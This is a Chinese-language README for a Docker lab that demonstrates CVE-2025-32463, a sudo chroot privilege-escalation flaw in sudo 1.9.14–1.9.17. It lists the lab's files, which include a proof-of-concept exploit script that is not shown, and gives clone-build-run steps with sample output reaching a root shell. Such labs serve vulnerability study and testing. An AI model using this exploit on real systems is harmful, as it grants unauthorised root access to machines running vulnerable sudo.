本仓库提供了一个最小化、可复现的环境,用于演示 sudo chroot 功能中的 CVE‑2025‑32463 权限提升漏洞。
| 文件 | 用途 |
|---|---|
| Dockerfile | 构建一个 Ubuntu 24.04 镜像,其中包含存在漏洞的 sudo 1.9.16p2 和构建工具 |
| sudo‑chwoot.sh | 概念验证(PoC)漏洞利用,可在 chroot 内生成 root shell |
| run.sh | 辅助脚本,用于构建镜像(如需要)并启动漏洞利用容器 |
大多数 Linux 发行版上,sudo 1.9.14 至 1.9.17(所有 p 修订版)的易受攻击构建均受影响。
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
run.sh 会向 Docker 传递 --privileged 和 --rm,因此退出时容器会自动清理。
完成后删除镜像:
docker rmi sudo-chwoot